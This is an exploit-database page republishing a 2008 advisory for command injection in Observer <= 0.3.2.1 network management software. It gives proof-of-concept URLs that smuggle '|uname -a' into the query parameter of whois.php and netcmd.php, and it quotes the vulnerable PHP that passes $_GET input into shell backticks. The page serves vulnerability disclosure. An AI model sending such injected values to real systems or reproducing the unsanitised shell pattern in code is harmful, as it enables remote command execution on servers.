Observer - exploit.company

vendor:

Observer

by:

dun

9.3

CVSS

HIGH

Remote Command Execution

CWE

Product Name: Observer

Affected Version From: 0.3.2.1

Affected Version To: 0.3.2.1

Patch Exists: YES

Related CWE: N/A

CPE: a:project-observer:observer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux/BSD

2008

Observer <= 0.3.2.1 Remote Command Execution

Observer is an autodiscovering PHP/MySQL/SNMP/CDP based network management system focused primarily on Cisco and Linux/BSD networks. A vulnerability exists in the Observer <= 0.3.2.1 version due to improper input validation in the whois.php and netcmd.php scripts. This allows an attacker to execute arbitrary commands on the vulnerable system.

Mitigation:

Upgrade to the latest version of Observer.

Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 #########################################################
 #  [ observer <= 0.3.2.1 ]   Remote Command Execution   #
 #########################################################
 #
 # Script: "Observer is an autodiscovering PHP/MySQL/SNMP/CDP based network management system focused primarily on Cisco and Linux/BSD networks."
 #
 # Script site: http://www.project-observer.org/
 # Download: http://freshmeat.net/projects/observer/
 #
 # Vuln: 
 # (1) http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a
 # (2) http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a    
 #
 #
 # Bug(1): ./observer-0.3.2.1/html/whois.php
 #
 # ...
 # 	$output = `/usr/bin/whois $_GET[query] | grep -v \%`;
 #	$output = trim($output);
 #	echo("<pre>$output</pre>");
 # ... 	 
 #
 #
 # Bug(2): ./observer-0.3.2.1/html/netcmd.php
 #
 # ...
 #  switch ($_GET[cmd]) {
 #   case 'whois':
 #     $output = `/usr/bin/whois $_GET[query] | grep -v \%`;
 #     break;
 #   case 'ping':
 #     $output = `/bin/ping $_GET[query]`;
 #     break;
 #   case 'tracert':
 #     $output = `/usr/sbin/traceroute $_GET[query]`;
 #     break;
 #   case 'nmap':
 #     $output = `/usr/bin/nmap $_GET[query]`;
 #     break;
 #  }
 #  $output = trim($output);
 #  echo("<pre>$output</pre>");
 # ... 			    		    
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-09-24]